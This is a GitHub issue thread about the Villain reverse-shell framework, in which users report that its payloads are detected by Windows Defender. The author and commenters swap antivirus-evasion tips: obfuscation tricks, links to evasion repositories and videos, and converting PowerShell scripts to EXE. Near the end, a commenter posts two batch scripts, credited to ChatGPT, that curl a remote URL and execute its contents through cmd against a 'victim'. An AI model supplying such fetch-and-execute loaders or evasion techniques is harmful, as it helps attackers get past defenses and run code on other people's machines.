Comments (26)
I made a small update in the payload templates and it seems to do the trick again (for now).
You should not expect this to last forever (by this or any other tool), the obfuscate function is there to assist you, not to do the job for you.
I will try to update the templates and improve the general functionality of Villain in time but there will be ups and downs, it's inevitable. I encourage you to look into AV evasion techniques both manually and by using automated tools, you can start by checking this repo out -> https://github.com/sinfulz/JustEvadeBro or some of the videos I've made.
from villain.
I made a video to give you ideas on how to bypass detection. I can update the templates or the auto-obf function but it's not worth it. https://www.youtube.com/watch?v=FVbdZSGkzhs
from villain.
I am intentionally leaving this open indefinitely.
from villain.
Thank you for response. Your tool is very useful and great work!
from villain.
@rikda It will eventually get detected, you need to apply your own magic to bypass.
from villain.
@t3l3machus Thx for your work ! Your code make me happy ton explain somes risk to my students :=)
from villain.
Using obfuscate option getting detected
from villain.
same issus
from villain.
@t3l3machus unfortunately with new windows defender update same issue again
from villain.
You might "cypher" de string unsing key ?
from villain.
@edikiuspy thank you :))
from villain.
@t3l3machus Nicely done for your explain.
Maybe you can use :
in your can obfuscate it by changing variable names.
Add OR AND conditions automaticly ? :)
The goal here is to not touch the payload generated ;)
from villain.
@gaalos That was the goal at the beginning. It doesn't matter how complicated i make it, it will just keep getting flagged and at some point the payload will be burned. I have tried many other tricks (including various string operations, adding logical operators here and there, it doesn't work).
from villain.
@t3l3machus yes it's true ^^.
Maybe create payload without powershell as binary file ?
from villain.
@gaalos yeah i have already done it! I will update soon with an additional windows cmd payload template
from villain.
detected by AV
from villain.
if you want to bypass defender please try these techniques
from villain.
@t3l3machus when did you do the update about "
Maybe create payload without powershell as binary file ?
Hey @t3l3machus when did you update it with binary payload ? :p
from villain.
@gaalos haven;t done such update and don't intent to. Other things are in order for Villain (after i release a new tool probably next Monday) :)
from villain.
@gaalos haven;t done such update and don't intent to. Other things are in order for Villain (after i release a new tool probably next Monday) :)
For me its still working like a charm ,but im wondring if there's a way to fix the payload to be able to work on OS Windows 8.1 ,it giving me this
from villain.
convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share
from villain.
convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share
Thank you for your replay, but unfortunately converting ps to exe doesn't help to get the reverse shell working
it works on widows 10 - 11 - server 2018 , but not ( Windows 8.1 )
from villain.
convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share
not working because it's just executing script, not a real BINARY/EXE File :)
from villain.
Does someone have the older version of villain? if yes can you guys send the file here pls
from villain.
The last version of Villain still gets detected by windows defender. The obfustacte function doesn't work for the netcat templates, i got this error "Ignoring unsupported arguments: OBFUSCATE" and add the obfuscate attrinut doesn't work either. Does someone how i can make this work ?
from villain.
Hey all i use something like curl to ... and it's work
Thx to chatGPT
run.bat
`
@echo off
REM Remplacez l'URL par celle que vous souhaitez appeler
set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run-http"
REM Effectue la requête curl à partir de l'URL et stocke la sortie dans une variable
for /f "usebackq delims=" %%i in (curl %url%
) do set "curl_output=%%i"
REM Exécute la sortie de la variable comme une commande
cmd /k %curl_output%
REM Terminer le script
exit
`
or
`
@echo off
REM Remplacez l'URL par celle que vous souhaitez appeler
set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run"
REM Effectue la requête curl à partir de l'URL et stocke la sortie dans une variable
for /f "usebackq delims=" %%i in (curl %url%
) do set "curl_output=%%i"
REM Exécute la sortie de la variable comme une commande
start /B cmd /k %curl_output%
REM Terminer le script
exit `
@t3l3machus Maybe you can try to create cmd/powreshell base on curl call ?
Obviously the "victim" need to get grant access to the external url
from villain.
Related Issues (20)
- [FeatureRequest] Have payloads be able to output to file HOT 1
- having some issue with update ? please help HOT 2
- ModuleNotFoundError when trying to run Villain.py HOT 1
- port taken HOT 1
- Help me with nohup = "nohup.out" :( HOT 6
- I tried as you told me and it says "bash: line 1: curl: order not found HOT 1
- Python library error HOT 5
- Using villain with Local tunnel or ngrok HOT 1
- help dns? HOT 3
- VM using local IP address instead of public for LHOST HOT 1
- I have a problem HOT 1
- [Cannot "cd" in shell] This session is unstable. Consider running a socket-based rshell process in it. HOT 1
- Villain --- Gets Stuck Updating HOT 4
- trying to create backdoor generate fails HOT 2
- PowerShell Agent Unexpected Crashes: Issue with "Read" Method HOT 3
- invalid escape sequence HOT 3
- [Enhancement] Allow users to choose which services are enabled HOT 1
- hoaxshell not working. HOT 1
- Alias not working for exec command HOT 3
- Confirming Normal Behavior on macOS HOT 2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from villain.